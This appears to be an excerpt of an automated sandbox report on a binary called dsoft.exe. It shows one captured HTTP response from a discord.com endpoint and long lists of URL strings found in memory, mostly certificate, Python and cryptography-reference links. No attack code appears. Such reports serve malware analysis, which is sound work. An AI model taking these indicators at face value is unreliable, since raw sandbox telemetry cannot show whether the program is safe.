Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 29 Dec 2024 19:03:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1735499021x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K0StTtU%2F3%2Fvj%2BW%2FOZfKGEL0W3sWyGFdKRcK6FFfhnVGzJHez5gEbX5z9FXx6sCgnPOHk0Uq6Hq1As2xe%2BU5MEzIF7T0BhwUlxqISEXHim6rSXhG%2BUyi92cpAwNkc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=3260a76bdbdeb514be93d6de4175fb4e0e46db02-1735499020; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=0NLw9C8uq4N18LTDgS2b9zPBeG_ptptkMvO1MQUJgCI-1735499020598-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f9c0d2e3bfd8c4b-EWR

Source: dsoft.exe, 00000001.00000002.2570912516.0000029489FA0000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2716548036.000001FA5D5E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: dsoft.exe, 00000001.00000002.2568617414.0000029489480000.00000004.00001000.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000002.2707717704.000001FA5CAE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27
Source: dsoft.exe, 0000000E.00000002.2707717704.000001FA5CAE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://aka.ms/vcpython27p
Source: dsoft.exe, 00000001.00000003.2545732531.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548674484.0000029488D9E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541343735.0000029489846000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554026491.0000029489853000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538385729.0000029488D9A000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538354750.0000029488D91000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2554394468.00000294896EA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550665354.0000029488ADF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542760819.000002948984B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2534884417.00000294896C4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2567353265.0000029488DA0000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541781590.000002948846D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539552656.0000029488462000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550535779.000002948963B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000002.2569022192.0000029489645000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2250652495.00000294896BB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895D3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550791640.0000029489643000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539842827.0000029488467000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
Source: dsoft.exe, 00000001.00000002.2571047548.000002948A1B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue23606)
Source: dsoft.exe, 00000001.00000002.2571047548.000002948A1B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://bugs.python.org/issue23606)P
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161F2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2165000044.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2165000044.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161F2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dsoft.exe, 00000001.00000002.2571047548.000002948A1B4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations
Source: dsoft.exe, 00000001.00000003.2537777125.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2537324099.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2009384833.0000029488561000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2551173697.0000029488588000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538354750.0000029488D91000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2548967761.0000029488583000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542139441.000002948857E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488BE5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539453832.0000029488525000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2012578673.0000029488BE5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2541993942.0000029488565000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2015658048.0000029488D4E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538217005.0000029488BBA000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2538106885.0000029488BAB000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2540133201.0000029488535000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488B98000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547645603.0000029488581000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2536542831.0000029488519000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2542281253.0000029488BFC000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539168516.000002948851C000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2014727825.0000029488D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: dsoft.exe, 00000001.00000003.2539909753.0000029488247000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547724695.0000029488249000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2688621656.000001FA5BAAF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2685843835.000001FA5BA92000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2183631612.000001FA5BB5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577916/
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161F2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2165000044.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: dsoft.exe, 0000000A.00000003.2160707465.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: dsoft.exe, 00000000.00000003.1990385921.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989600243.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1993838647.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986037368.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1988692704.00000177161F2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987314194.00000177161F4000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1987164088.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986962880.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986235896.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1989868193.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dsoft.exe, 00000000.00000003.1989465839.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2163908416.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: dsoft.exe, 00000001.00000003.2541781590.000002948846D000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539552656.0000029488462000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2539842827.0000029488467000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2547514499.000002948848E000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2549283681.0000029488493000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2685660711.000001FA5BBF2000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2695751088.000001FA5BBF5000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2420767058.000001FA5BBA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: dsoft.exe, 00000001.00000003.2545732531.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2550665354.0000029488ADF000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2535930492.0000029488ADE000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 00000001.00000003.2555145721.00000294895D3000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2679719201.000001FA5B864000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000E.00000003.2686149501.000001FA5B865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
